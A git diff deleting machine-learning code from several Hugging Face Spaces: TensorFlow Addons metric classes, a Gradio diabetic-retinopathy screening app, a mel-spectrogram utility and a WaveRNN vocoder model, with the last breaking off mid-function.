- regression: (bool) If set, that means the problem is being treated
- as a regression problem where you are regressing the predictions.
-        **Note:** If you are regressing for the values, the output layer
- should contain a single unit.
- name: (optional) String name of the metric instance
- dtype: (optional) Data type of the metric result. Defaults to `None`.
-
- Raises:
- ValueError: If the value passed for `weightage` is invalid
- i.e. not any one of [None, 'linear', 'quadratic'].
-
- Usage:
-
- >>> y_true = np.array([4, 4, 3, 4, 2, 4, 1, 1], dtype=np.int32)
- >>> y_pred = np.array([4, 4, 3, 4, 4, 2, 1, 1], dtype=np.int32)
- >>> weights = np.array([1, 1, 2, 5, 10, 2, 3, 3], dtype=np.int32)
- >>> metric = tfa.metrics.CohenKappa(num_classes=5, sparse_labels=True)
- >>> metric.update_state(y_true , y_pred)
-
- >>> result = metric.result()
- >>> result.numpy()
- 0.61904764
- >>> # To use this with weights, sample_weight argument can be used.
- >>> metric = tfa.metrics.CohenKappa(num_classes=5, sparse_labels=True)
- >>> metric.update_state(y_true , y_pred , sample_weight=weights)
-
- >>> result = metric.result()
- >>> result.numpy()
- 0.37209308
-
- Usage with `tf.keras` API:
-
- >>> inputs = tf.keras.Input(shape=(10,))
- >>> x = tf.keras.layers.Dense(10)(inputs)
- >>> outputs = tf.keras.layers.Dense(1)(x)
- >>> model = tf.keras.models.Model(inputs=inputs, outputs=outputs)
- >>> model.compile('sgd', loss='mse', metrics=[tfa.metrics.CohenKappa(num_classes=3, sparse_labels=True)])
- """
-
- @typechecked
- def __init__(
- self,
- num_classes: FloatTensorLike,
- name: str = "cohen_kappa",
- weightage: Optional[str] = None,
- sparse_labels: bool = False,
- regression: bool = False,
- dtype: AcceptableDTypes = None,
- ):
- """Creates a `CohenKappa` instance."""
- super().__init__(name=name, dtype=dtype)
-
- if weightage not in (None, "linear", "quadratic"):
- raise ValueError("Unknown kappa weighting type.")
-
- if num_classes == 2:
- self._update = self._update_binary_class_model
- elif num_classes > 2:
- self._update = self._update_multi_class_model
- else:
- raise ValueError(
- """Number of classes must be
-                greater than or equal to two"""
- )
-
- self.weightage = weightage
- self.num_classes = num_classes
- self.regression = regression
- self.sparse_labels = sparse_labels
- self.conf_mtx = self.add_weight(
- "conf_mtx",
- shape=(self.num_classes, self.num_classes),
- initializer=tf.keras.initializers.zeros,
- dtype=tf.float32,
- )
-
- def update_state(self, y_true, y_pred, sample_weight=None):
- """Accumulates the confusion matrix condition statistics.
-
- Args:
- y_true: Labels assigned by the first annotator with shape
- `[num_samples,]`.
- y_pred: Labels assigned by the second annotator with shape
- `[num_samples,]`. The kappa statistic is symmetric,
- so swapping `y_true` and `y_pred` doesn't change the value.
- sample_weight (optional): for weighting labels in confusion matrix
- Defaults to `None`. The dtype for weights should be the same
- as the dtype for confusion matrix. For more details,
- please check `tf.math.confusion_matrix`.
-
- Returns:
- Update op.
- """
- return self._update(y_true, y_pred, sample_weight)
-
- def _update_binary_class_model(self, y_true, y_pred, sample_weight=None):
- y_true = tf.cast(y_true, dtype=tf.int64)
- y_pred = tf.cast(y_pred, dtype=tf.float32)
- y_pred = tf.cast(y_pred > 0.5, dtype=tf.int64)
- return self._update_confusion_matrix(y_true, y_pred, sample_weight)
-
- @tf.function
- def _update_multi_class_model(self, y_true, y_pred, sample_weight=None):
- v = tf.argmax(y_true, axis=1) if not self.sparse_labels else y_true
- y_true = tf.cast(v, dtype=tf.int64)
-
- y_pred = self._cast_ypred(y_pred)
-
- return self._update_confusion_matrix(y_true, y_pred, sample_weight)
-
- @tf.function
- def _cast_ypred(self, y_pred):
- if tf.rank(y_pred) > 1:
- if not self.regression:
- y_pred = tf.cast(tf.argmax(y_pred, axis=-1), dtype=tf.int64)
- else:
- y_pred = tf.math.round(tf.math.abs(y_pred))
- y_pred = tf.cast(y_pred, dtype=tf.int64)
- else:
- y_pred = tf.cast(y_pred, dtype=tf.int64)
- return y_pred
-
- @tf.function
- def _safe_squeeze(self, y):
- y = tf.squeeze(y)
-
- # Check for scalar result
- if tf.rank(y) == 0:
- y = tf.expand_dims(y, 0)
-
- return y
-
- def _update_confusion_matrix(self, y_true, y_pred, sample_weight):
- y_true = self._safe_squeeze(y_true)
- y_pred = self._safe_squeeze(y_pred)
-
- new_conf_mtx = tf.math.confusion_matrix(
- labels=y_true,
- predictions=y_pred,
- num_classes=self.num_classes,
- weights=sample_weight,
- dtype=tf.float32,
- )
-
- return self.conf_mtx.assign_add(new_conf_mtx)
-
- def result(self):
- nb_ratings = tf.shape(self.conf_mtx)[0]
- weight_mtx = tf.ones([nb_ratings, nb_ratings], dtype=tf.float32)
-
- # 2. Create a weight matrix
- if self.weightage is None:
- diagonal = tf.zeros([nb_ratings], dtype=tf.float32)
- weight_mtx = tf.linalg.set_diag(weight_mtx, diagonal=diagonal)
- else:
- weight_mtx += tf.cast(tf.range(nb_ratings), dtype=tf.float32)
- weight_mtx = tf.cast(weight_mtx, dtype=self.dtype)
-
- if self.weightage == "linear":
- weight_mtx = tf.abs(weight_mtx - tf.transpose(weight_mtx))
- else:
- weight_mtx = tf.pow((weight_mtx - tf.transpose(weight_mtx)), 2)
-
- weight_mtx = tf.cast(weight_mtx, dtype=self.dtype)
-
- # 3. Get counts
- actual_ratings_hist = tf.reduce_sum(self.conf_mtx, axis=1)
- pred_ratings_hist = tf.reduce_sum(self.conf_mtx, axis=0)
-
- # 4. Get the outer product
- out_prod = pred_ratings_hist[..., None] * actual_ratings_hist[None, ...]
-
- # 5. Normalize the confusion matrix and outer product
- conf_mtx = self.conf_mtx / tf.reduce_sum(self.conf_mtx)
- out_prod = out_prod / tf.reduce_sum(out_prod)
-
- conf_mtx = tf.cast(conf_mtx, dtype=self.dtype)
- out_prod = tf.cast(out_prod, dtype=self.dtype)
-
- # 6. Calculate Kappa score
- numerator = tf.reduce_sum(conf_mtx * weight_mtx)
- denominator = tf.reduce_sum(out_prod * weight_mtx)
- return tf.cond(
- tf.math.is_nan(denominator),
- true_fn=lambda: 0.0,
- false_fn=lambda: 1 - (numerator / denominator),
- )
-
- def get_config(self):
- """Returns the serializable config of the metric."""
-
- config = {
- "num_classes": self.num_classes,
- "weightage": self.weightage,
- "sparse_labels": self.sparse_labels,
- "regression": self.regression,
- }
- base_config = super().get_config()
- return {**base_config, **config}
-
- def reset_state(self):
- """Resets all of the metric state variables."""
-
- for v in self.variables:
- K.set_value(
- v,
- np.zeros((self.num_classes, self.num_classes), v.dtype.as_numpy_dtype),
- )
-
- def reset_states(self):
- # Backwards compatibility alias of `reset_state`. New classes should
- # only implement `reset_state`.
- # Required in Tensorflow < 2.5.0
- return self.reset_state()
-
-
-# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-# ==============================================================================
-"""Implements Multi-label confusion matrix scores."""
-
-import warnings
-
-import tensorflow as tf
-from tensorflow.keras import backend as K
-from tensorflow.keras.metrics import Metric
-import numpy as np
-
-from typeguard import typechecked
-
-
-class MultiLabelConfusionMatrix(Metric):
- """Computes Multi-label confusion matrix.
-
- Class-wise confusion matrix is computed for the
- evaluation of classification.
-
- If multi-class input is provided, it will be treated
- as multilabel data.
-
- Consider classification problem with two classes
- (i.e num_classes=2).
-
- Resultant matrix `M` will be in the shape of `(num_classes, 2, 2)`.
-
- Every class `i` has a dedicated matrix of shape `(2, 2)` that contains:
-
- - true negatives for class `i` in `M(0,0)`
- - false positives for class `i` in `M(0,1)`
- - false negatives for class `i` in `M(1,0)`
- - true positives for class `i` in `M(1,1)`
-
- Args:
- num_classes: `int`, the number of labels the prediction task can have.
- name: (Optional) string name of the metric instance.
- dtype: (Optional) data type of the metric result.
-
- Usage:
-
- >>> # multilabel confusion matrix
- >>> y_true = np.array([[1, 0, 1], [0, 1, 0]], dtype=np.int32)
- >>> y_pred = np.array([[1, 0, 0], [0, 1, 1]], dtype=np.int32)
- >>> metric = tfa.metrics.MultiLabelConfusionMatrix(num_classes=3)
- >>> metric.update_state(y_true, y_pred)
- >>> result = metric.result()
- >>> result.numpy() #doctest: -DONT_ACCEPT_BLANKLINE
- array([[[1., 0.],
- [0., 1.]],
-
- [[1., 0.],
- [0., 1.]],
-
- [[0., 1.],
- [1., 0.]]], dtype=float32)
- >>> # if multiclass input is provided
- >>> y_true = np.array([[1, 0, 0], [0, 1, 0]], dtype=np.int32)
- >>> y_pred = np.array([[1, 0, 0], [0, 0, 1]], dtype=np.int32)
- >>> metric = tfa.metrics.MultiLabelConfusionMatrix(num_classes=3)
- >>> metric.update_state(y_true, y_pred)
- >>> result = metric.result()
- >>> result.numpy() #doctest: -DONT_ACCEPT_BLANKLINE
- array([[[1., 0.],
- [0., 1.]],
-
- [[1., 0.],
- [1., 0.]],
-
- [[1., 1.],
- [0., 0.]]], dtype=float32)
-
- """
-
- @typechecked
- def __init__(
- self,
- num_classes: FloatTensorLike,
- name: str = "Multilabel_confusion_matrix",
- dtype: AcceptableDTypes = None,
- **kwargs,
- ):
- super().__init__(name=name, dtype=dtype)
- self.num_classes = num_classes
- self.true_positives = self.add_weight(
- "true_positives",
- shape=[self.num_classes],
- initializer="zeros",
- dtype=self.dtype,
- )
- self.false_positives = self.add_weight(
- "false_positives",
- shape=[self.num_classes],
- initializer="zeros",
- dtype=self.dtype,
- )
- self.false_negatives = self.add_weight(
- "false_negatives",
- shape=[self.num_classes],
- initializer="zeros",
- dtype=self.dtype,
- )
- self.true_negatives = self.add_weight(
- "true_negatives",
- shape=[self.num_classes],
- initializer="zeros",
- dtype=self.dtype,
- )
-
- def update_state(self, y_true, y_pred, sample_weight=None):
- if sample_weight is not None:
- warnings.warn(
- "`sample_weight` is not None. Be aware that MultiLabelConfusionMatrix "
- "does not take `sample_weight` into account when computing the metric "
- "value."
- )
-
- y_true = tf.cast(y_true, tf.int32)
- y_pred = tf.cast(y_pred, tf.int32)
- # true positive
- true_positive = tf.math.count_nonzero(y_true * y_pred, 0)
- # predictions sum
- pred_sum = tf.math.count_nonzero(y_pred, 0)
- # true labels sum
- true_sum = tf.math.count_nonzero(y_true, 0)
- false_positive = pred_sum - true_positive
- false_negative = true_sum - true_positive
- y_true_negative = tf.math.not_equal(y_true, 1)
- y_pred_negative = tf.math.not_equal(y_pred, 1)
- true_negative = tf.math.count_nonzero(
- tf.math.logical_and(y_true_negative, y_pred_negative), axis=0
- )
-
- # true positive state update
- self.true_positives.assign_add(tf.cast(true_positive, self.dtype))
- # false positive state update
- self.false_positives.assign_add(tf.cast(false_positive, self.dtype))
- # false negative state update
- self.false_negatives.assign_add(tf.cast(false_negative, self.dtype))
- # true negative state update
- self.true_negatives.assign_add(tf.cast(true_negative, self.dtype))
-
- def result(self):
- flat_confusion_matrix = tf.convert_to_tensor(
- [
- self.true_negatives,
- self.false_positives,
- self.false_negatives,
- self.true_positives,
- ]
- )
- # reshape into 2*2 matrix
- confusion_matrix = tf.reshape(tf.transpose(flat_confusion_matrix), [-1, 2, 2])
-
- return confusion_matrix
-
- def get_config(self):
- """Returns the serializable config of the metric."""
-
- config = {
- "num_classes": self.num_classes,
- }
- base_config = super().get_config()
- return {**base_config, **config}
-
- def reset_state(self):
- reset_value = np.zeros(self.num_classes, dtype=np.int32)
- K.batch_set_value([(v, reset_value) for v in self.variables])
-
- def reset_states(self):
- # Backwards compatibility alias of `reset_state`. New classes should
- # only implement `reset_state`.
- # Required in Tensorflow < 2.5.0
- return self.reset_state()
-#####
-
-IMAGE_SIZE = 128
-NUM_CLASSES = 3
-
-def preprocess_image(image, target_size, add_clahe=True, clip_limit=4, tile_grid_size=(40,40), all_clahe=True):
- """
- Preprocess the images to remove black borders
- and improve contrast using Y channel and CLAHE
- """
- try:
- # Crop the image to remove black borders
- cropped_rgb_image = remove_black_borders(image)
-
- if add_clahe:
- equalised_image = apply_clahe(
- cropped_rgb_image, clip_limit, tile_grid_size, all_clahe)
-
- # Resize the image to target size
- resized_image = cv2.resize(equalised_image, (target_size, target_size))
- else:
- # Resize the image to target size
- resized_image = cv2.resize(cropped_rgb_image, (target_size, target_size))
-
- return resized_image
-
- except Exception as e:
- print("Error processing image: ")
- print(e)
-
-
-def remove_black_borders(image):
- """
- Crop the image to remove black borders
- """
- green_channel_image = image[:, :, 1]
-
- # Find the contours in the green channel
- contours, _ = cv2.findContours(
- green_channel_image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
-
- # Find the largest contour
- largest_contour = max(contours, key=cv2.contourArea)
-
- # Get the bounding rectangle of the largest contour
- x, y, w, h = cv2.boundingRect(largest_contour)
-
- # Create a mask with the same size as the bounding rectangle
- mask = np.zeros((h, w), np.uint8)
-
- # Draw the largest contour on the mask
- cv2.drawContours(mask, [largest_contour - [x, y]], 0, 255, -1)
-
- # Convert the mask to a 3 channel image
- mask_3_channel = cv2.merge([mask, mask, mask])
-
- # Crop the image using the mask
- cropped_image = cv2.bitwise_and(image[y:y+h, x:x+w], mask_3_channel)
-
- return cropped_image
-
-
-def apply_clahe(image, clip_limit=4, tile_grid_size=(40,40), all_clahe=False):
- """
- Preprocess the image
- """
- try:
- # Extract the y channel from the cropped rgb image
- yuv_image = cv2.cvtColor(image, cv2.COLOR_RGB2YUV)
- cropped_y_channel_image = yuv_image[:, :, 0]
-
- # Apply CLAHE to the y channel of the cropped image
- clahe = cv2.createCLAHE(clipLimit=clip_limit, tileGridSize=tile_grid_size)
- enhanced_y_channel = clahe.apply(cropped_y_channel_image)
-
- if all_clahe:
- cropped_u_channel = yuv_image[:, :, 1]
- enhanced_u_channel = clahe.apply(cropped_u_channel)
- cropped_v_channel = yuv_image[:, :, 2]
- enhanced_v_channel = clahe.apply(cropped_v_channel)
-
- enhanced_yuv_image = np.stack([enhanced_y_channel, enhanced_u_channel, enhanced_v_channel], axis=-1)
-
- # Convert YUV to RGB
- enhanced_rgb_image = cv2.cvtColor(enhanced_yuv_image, cv2.COLOR_YUV2RGB)
-
- return enhanced_rgb_image
- else:
- # Convert the y channel image to grayscale
- enhanced_grayscale_image = cv2.convertScaleAbs(enhanced_y_channel, alpha=(255/219))
-
- # Repeat the equalised grayscale for all 3-channels
- enhanced_grayscale_3_channels = np.stack((enhanced_grayscale_image,) * 3, axis=-1)
-
- return enhanced_grayscale_3_channels
-
- except Exception as e:
- print("Error processing image: ", e)
-
-
-def load_vgg16_model():
- vgg16_DR = tf.keras.models.load_model('./VGG16_32_128_CLAHE_4_40_trainableFalse.h5', custom_objects={
- 'WeightedKappaLoss': tfa.losses.WeightedKappaLoss,
- 'CohenKappa': tfa.metrics.CohenKappa,
- 'F1Score': tf.keras.metrics.F1Score,
- 'MultiLabelConfusionMatrix': tfa.metrics.MultiLabelConfusionMatrix
- })
- return vgg16_DR
-
-
-def predict_input_image(img):
- img = preprocess_image(img, IMAGE_SIZE, add_clahe=True, clip_limit=4, tile_grid_size=(40,40), all_clahe=False)
- img_4d=img.reshape(-1, IMAGE_SIZE, IMAGE_SIZE, 3)
- model = load_vgg16_model()
- prediction=model.predict([img_4d])[0]
-
- dr_classes = ['No DR', 'Mild DR', 'Referable DR']
- return {dr_classes[i]: float(prediction[i]) for i in range(3)}
-
-image = gr.inputs.Image(shape=(IMAGE_SIZE, IMAGE_SIZE))
-label = gr.outputs.Label(num_top_classes=NUM_CLASSES)
-examples_dir = './example_images'
-iface = gr.Interface(
- fn=predict_input_image,
- inputs=image,
- outputs=label,
- title="Diabetic Retinopathy (DR) Screener",
- description="Submit a retinal image to classify it into No DR, Mild DR, or Referable DR (Moderate/Severe/Proliferative DR)\n- No DR: Rescreen in 12 months.\n- Mild DR: Rescreen in 6 months but be mindful of your sugar level to delay symptoms.\n- Referable DR: Please visit an eye specialist immediately!",
- article="Note that this Deep Neural Network (DNN) model has an 89% Quadratic Weighted Kappa (QWK) score and 87% Sensitivity and as such, may not always be correct.\nPlease consult an eye specialist to validate the results. If you're an eyecare professional, please help improve the model by flagging incorrect predictions for future model retraining. Thank you!",
- examples=examples_dir,
- allow_flagging="manual",
- flagging_options=["Incorrect! Should be Referable DR", "Incorrect! Should be Mild DR", "Incorrect! Should be No DR", "Ambiguous"]
-)
-iface.launch()
\ No newline at end of file
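A minimal sketch of exercising the preprocessing path of the deleted app above outside Gradio, with the same CLAHE settings predict_input_image uses; the retinal image path is a hypothetical placeholder.

import cv2

img = cv2.cvtColor(cv2.imread("retina_sample.jpg"), cv2.COLOR_BGR2RGB)  # hypothetical fundus photo
processed = preprocess_image(img, IMAGE_SIZE, add_clahe=True,
                             clip_limit=4, tile_grid_size=(40, 40), all_clahe=False)
print(processed.shape)  # (128, 128, 3), ready for model.predict after reshaping to a batch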
diff --git a/spaces/Mahiruoshi/MyGO_VIts-bert/mel_processing.py b/spaces/Mahiruoshi/MyGO_VIts-bert/mel_processing.py
deleted file mode 100644
index aab5bd926a194610b7ce3da29c553bd877341aa4..0000000000000000000000000000000000000000
--- a/spaces/Mahiruoshi/MyGO_VIts-bert/mel_processing.py
+++ /dev/null
@@ -1,139 +0,0 @@
-import torch
-import torch.utils.data
-from librosa.filters import mel as librosa_mel_fn
-
-MAX_WAV_VALUE = 32768.0
-
-
-def dynamic_range_compression_torch(x, C=1, clip_val=1e-5):
- """
- PARAMS
- ------
- C: compression factor
- """
- return torch.log(torch.clamp(x, min=clip_val) * C)
-
-
-def dynamic_range_decompression_torch(x, C=1):
- """
- PARAMS
- ------
- C: compression factor used to compress
- """
- return torch.exp(x) / C
-
-
-def spectral_normalize_torch(magnitudes):
- output = dynamic_range_compression_torch(magnitudes)
- return output
-
-
-def spectral_de_normalize_torch(magnitudes):
- output = dynamic_range_decompression_torch(magnitudes)
- return output
-
-
-mel_basis = {}
-hann_window = {}
-
-
-def spectrogram_torch(y, n_fft, sampling_rate, hop_size, win_size, center=False):
- if torch.min(y) < -1.0:
- print("min value is ", torch.min(y))
- if torch.max(y) > 1.0:
- print("max value is ", torch.max(y))
-
- global hann_window
- dtype_device = str(y.dtype) + "_" + str(y.device)
- wnsize_dtype_device = str(win_size) + "_" + dtype_device
- if wnsize_dtype_device not in hann_window:
- hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(
- dtype=y.dtype, device=y.device
- )
-
- y = torch.nn.functional.pad(
- y.unsqueeze(1),
- (int((n_fft - hop_size) / 2), int((n_fft - hop_size) / 2)),
- mode="reflect",
- )
- y = y.squeeze(1)
-
- spec = torch.stft(
- y,
- n_fft,
- hop_length=hop_size,
- win_length=win_size,
- window=hann_window[wnsize_dtype_device],
- center=center,
- pad_mode="reflect",
- normalized=False,
- onesided=True,
- return_complex=False,
- )
-
- spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6)
- return spec
-
-
-def spec_to_mel_torch(spec, n_fft, num_mels, sampling_rate, fmin, fmax):
- global mel_basis
- dtype_device = str(spec.dtype) + "_" + str(spec.device)
- fmax_dtype_device = str(fmax) + "_" + dtype_device
- if fmax_dtype_device not in mel_basis:
- mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax)
- mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(
- dtype=spec.dtype, device=spec.device
- )
- spec = torch.matmul(mel_basis[fmax_dtype_device], spec)
- spec = spectral_normalize_torch(spec)
- return spec
-
-
-def mel_spectrogram_torch(
- y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False
-):
- if torch.min(y) < -1.0:
- print("min value is ", torch.min(y))
- if torch.max(y) > 1.0:
- print("max value is ", torch.max(y))
-
- global mel_basis, hann_window
- dtype_device = str(y.dtype) + "_" + str(y.device)
- fmax_dtype_device = str(fmax) + "_" + dtype_device
- wnsize_dtype_device = str(win_size) + "_" + dtype_device
- if fmax_dtype_device not in mel_basis:
- mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax)
- mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(
- dtype=y.dtype, device=y.device
- )
- if wnsize_dtype_device not in hann_window:
- hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(
- dtype=y.dtype, device=y.device
- )
-
- y = torch.nn.functional.pad(
- y.unsqueeze(1),
- (int((n_fft - hop_size) / 2), int((n_fft - hop_size) / 2)),
- mode="reflect",
- )
- y = y.squeeze(1)
-
- spec = torch.stft(
- y,
- n_fft,
- hop_length=hop_size,
- win_length=win_size,
- window=hann_window[wnsize_dtype_device],
- center=center,
- pad_mode="reflect",
- normalized=False,
- onesided=True,
- return_complex=False,
- )
-
- spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6)
-
- spec = torch.matmul(mel_basis[fmax_dtype_device], spec)
- spec = spectral_normalize_torch(spec)
-
- return spec
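A quick sketch of calling the deleted mel_spectrogram_torch above; the STFT/mel parameters here are illustrative assumptions rather than this repo's config values, and the positional librosa mel call in the module assumes an older librosa (<0.10).

import torch

y = torch.rand(1, 44100) * 2 - 1  # one second of dummy audio in [-1, 1]
mel = mel_spectrogram_torch(
    y, n_fft=2048, num_mels=128, sampling_rate=44100,
    hop_size=512, win_size=2048, fmin=0.0, fmax=None, center=False,
)
print(mel.shape)  # (1, 128, n_frames)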
diff --git a/spaces/Mahmoud7/mobile_price_prediction/README.md b/spaces/Mahmoud7/mobile_price_prediction/README.md
deleted file mode 100644
index 3080ce642b0a2a5182a2336c3442348bf33aa8eb..0000000000000000000000000000000000000000
--- a/spaces/Mahmoud7/mobile_price_prediction/README.md
+++ /dev/null
@@ -1,12 +0,0 @@
----
-title: Mobile Price Prediction
-emoji: 📚
-colorFrom: yellow
-colorTo: blue
-sdk: streamlit
-sdk_version: 1.15.2
-app_file: app.py
-pinned: false
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
diff --git a/spaces/Marne/MockingBird/mockingbirdforuse/vocoder/wavernn/models/fatchord_version.py b/spaces/Marne/MockingBird/mockingbirdforuse/vocoder/wavernn/models/fatchord_version.py
deleted file mode 100644
index e20aa221c9b9d7f008c93fc5a9b56a43919c5e8a..0000000000000000000000000000000000000000
--- a/spaces/Marne/MockingBird/mockingbirdforuse/vocoder/wavernn/models/fatchord_version.py
+++ /dev/null
@@ -1,445 +0,0 @@
-import time
-import torch
-import numpy as np
-import torch.nn as nn
-import torch.nn.functional as F
-from torch.nn.parameter import Parameter
-
-from ..audio import de_emphasis, decode_mu_law
-from ..hparams import hparams as hp
-from ...distribution import sample_from_discretized_mix_logistic
-from ....log import logger
-
-
-class ResBlock(nn.Module):
- def __init__(self, dims):
- super().__init__()
- self.conv1 = nn.Conv1d(dims, dims, kernel_size=1, bias=False)
- self.conv2 = nn.Conv1d(dims, dims, kernel_size=1, bias=False)
- self.batch_norm1 = nn.BatchNorm1d(dims)
- self.batch_norm2 = nn.BatchNorm1d(dims)
-
- def forward(self, x):
- residual = x
- x = self.conv1(x)
- x = self.batch_norm1(x)
- x = F.relu(x)
- x = self.conv2(x)
- x = self.batch_norm2(x)
- return x + residual
-
-
-class MelResNet(nn.Module):
- def __init__(self, res_blocks, in_dims, compute_dims, res_out_dims, pad):
- super().__init__()
- k_size = pad * 2 + 1
- self.conv_in = nn.Conv1d(in_dims, compute_dims, kernel_size=k_size, bias=False)
- self.batch_norm = nn.BatchNorm1d(compute_dims)
- self.layers = nn.ModuleList()
- for i in range(res_blocks):
- self.layers.append(ResBlock(compute_dims))
- self.conv_out = nn.Conv1d(compute_dims, res_out_dims, kernel_size=1)
-
- def forward(self, x):
- x = self.conv_in(x)
- x = self.batch_norm(x)
- x = F.relu(x)
- for f in self.layers:
- x = f(x)
- x = self.conv_out(x)
- return x
-
-
-class Stretch2d(nn.Module):
- def __init__(self, x_scale, y_scale):
- super().__init__()
- self.x_scale = x_scale
- self.y_scale = y_scale
-
- def forward(self, x):
- b, c, h, w = x.size()
- x = x.unsqueeze(-1).unsqueeze(3)
- x = x.repeat(1, 1, 1, self.y_scale, 1, self.x_scale)
- return x.view(b, c, h * self.y_scale, w * self.x_scale)
-
-
-class UpsampleNetwork(nn.Module):
- def __init__(
- self, feat_dims, upsample_scales, compute_dims, res_blocks, res_out_dims, pad
- ):
- super().__init__()
-        total_scale = np.cumprod(upsample_scales)[-1]
- self.indent = pad * total_scale
- self.resnet = MelResNet(res_blocks, feat_dims, compute_dims, res_out_dims, pad)
- self.resnet_stretch = Stretch2d(total_scale, 1)
- self.up_layers = nn.ModuleList()
- for scale in upsample_scales:
- k_size = (1, scale * 2 + 1)
- padding = (0, scale)
- stretch = Stretch2d(scale, 1)
- conv = nn.Conv2d(1, 1, kernel_size=k_size, padding=padding, bias=False)
- conv.weight.data.fill_(1.0 / k_size[1])
- self.up_layers.append(stretch)
- self.up_layers.append(conv)
-
- def forward(self, m):
- aux = self.resnet(m).unsqueeze(1)
- aux = self.resnet_stretch(aux)
- aux = aux.squeeze(1)
- m = m.unsqueeze(1)
- for f in self.up_layers:
- m = f(m)
- m = m.squeeze(1)[:, :, self.indent : -self.indent]
- return m.transpose(1, 2), aux.transpose(1, 2)
-
-
-class WaveRNN(nn.Module):
- def __init__(
- self,
- rnn_dims,
- fc_dims,
- bits,
- pad,
- upsample_factors,
- feat_dims,
- compute_dims,
- res_out_dims,
- res_blocks,
- hop_length,
- sample_rate,
- mode="RAW",
- ):
- super().__init__()
- self.mode = mode
- self.pad = pad
- if self.mode == "RAW":
- self.n_classes = 2**bits
- elif self.mode == "MOL":
- self.n_classes = 30
- else:
-            raise RuntimeError("Unknown model mode value - ", self.mode)
-
- self.rnn_dims = rnn_dims
- self.aux_dims = res_out_dims // 4
- self.hop_length = hop_length
- self.sample_rate = sample_rate
-
- self.upsample = UpsampleNetwork(
- feat_dims, upsample_factors, compute_dims, res_blocks, res_out_dims, pad
- )
- self.I = nn.Linear(feat_dims + self.aux_dims + 1, rnn_dims)
- self.rnn1 = nn.GRU(rnn_dims, rnn_dims, batch_first=True)
- self.rnn2 = nn.GRU(rnn_dims + self.aux_dims, rnn_dims, batch_first=True)
- self.fc1 = nn.Linear(rnn_dims + self.aux_dims, fc_dims)
- self.fc2 = nn.Linear(fc_dims + self.aux_dims, fc_dims)
- self.fc3 = nn.Linear(fc_dims, self.n_classes)
-
- self.step = Parameter(torch.zeros(1).long(), requires_grad=False)
- self.num_params()
-
- def forward(self, x, mels):
- self.step += 1
- bsize = x.size(0)
- if torch.cuda.is_available():
- h1 = torch.zeros(1, bsize, self.rnn_dims).cuda()
- h2 = torch.zeros(1, bsize, self.rnn_dims).cuda()
- else:
- h1 = torch.zeros(1, bsize, self.rnn_dims).cpu()
- h2 = torch.zeros(1, bsize, self.rnn_dims).cpu()
- mels, aux = self.upsample(mels)
-
- aux_idx = [self.aux_dims * i for i in range(5)]
- a1 = aux[:, :, aux_idx[0] : aux_idx[1]]
- a2 = aux[:, :, aux_idx[1] : aux_idx[2]]
- a3 = aux[:, :, aux_idx[2] : aux_idx[3]]
- a4 = aux[:, :, aux_idx[3] : aux_idx[4]]
-
- x = torch.cat([x.unsqueeze(-1), mels, a1], dim=2)
- x = self.I(x)
- res = x
- x, _ = self.rnn1(x, h1)
-
- x = x + res
- res = x
- x = torch.cat([x, a2], dim=2)
- x, _ = self.rnn2(x, h2)
-
- x = x + res
- x = torch.cat([x, a3], dim=2)
- x = F.relu(self.fc1(x))
-
- x = torch.cat([x, a4], dim=2)
- x = F.relu(self.fc2(x))
- return self.fc3(x)
-
- def generate(self, mels, batched, target, overlap, mu_law):
- mu_law = mu_law if self.mode == "RAW" else False
-
- self.eval()
- output = []
- start = time.time()
- rnn1 = self.get_gru_cell(self.rnn1)
- rnn2 = self.get_gru_cell(self.rnn2)
-
- with torch.no_grad():
- if torch.cuda.is_available():
- mels = mels.cuda()
- else:
- mels = mels.cpu()
- wave_len = (mels.size(-1) - 1) * self.hop_length
- mels = self.pad_tensor(mels.transpose(1, 2), pad=self.pad, side="both")
- mels, aux = self.upsample(mels.transpose(1, 2))
-
- if batched:
- mels = self.fold_with_overlap(mels, target, overlap)
- aux = self.fold_with_overlap(aux, target, overlap)
-
- b_size, seq_len, _ = mels.size()
-
- if torch.cuda.is_available():
- h1 = torch.zeros(b_size, self.rnn_dims).cuda()
- h2 = torch.zeros(b_size, self.rnn_dims).cuda()
- x = torch.zeros(b_size, 1).cuda()
- else:
- h1 = torch.zeros(b_size, self.rnn_dims).cpu()
- h2 = torch.zeros(b_size, self.rnn_dims).cpu()
- x = torch.zeros(b_size, 1).cpu()
-
- d = self.aux_dims
- aux_split = [aux[:, :, d * i : d * (i + 1)] for i in range(4)]
-
- for i in range(seq_len):
-
- m_t = mels[:, i, :]
-
- a1_t, a2_t, a3_t, a4_t = (a[:, i, :] for a in aux_split)
-
- x = torch.cat([x, m_t, a1_t], dim=1)
- x = self.I(x)
- h1 = rnn1(x, h1)
-
- x = x + h1
- inp = torch.cat([x, a2_t], dim=1)
- h2 = rnn2(inp, h2)
-
- x = x + h2
- x = torch.cat([x, a3_t], dim=1)
- x = F.relu(self.fc1(x))
-
- x = torch.cat([x, a4_t], dim=1)
- x = F.relu(self.fc2(x))
-
- logits = self.fc3(x)
-
- if self.mode == "MOL":
- sample = sample_from_discretized_mix_logistic(
- logits.unsqueeze(0).transpose(1, 2)
- )
- output.append(sample.view(-1))
- if torch.cuda.is_available():
- # x = torch.FloatTensor([[sample]]).cuda()
- x = sample.transpose(0, 1).cuda()
- else:
- x = sample.transpose(0, 1)
-
- elif self.mode == "RAW":
- posterior = F.softmax(logits, dim=1)
- distrib = torch.distributions.Categorical(posterior)
-
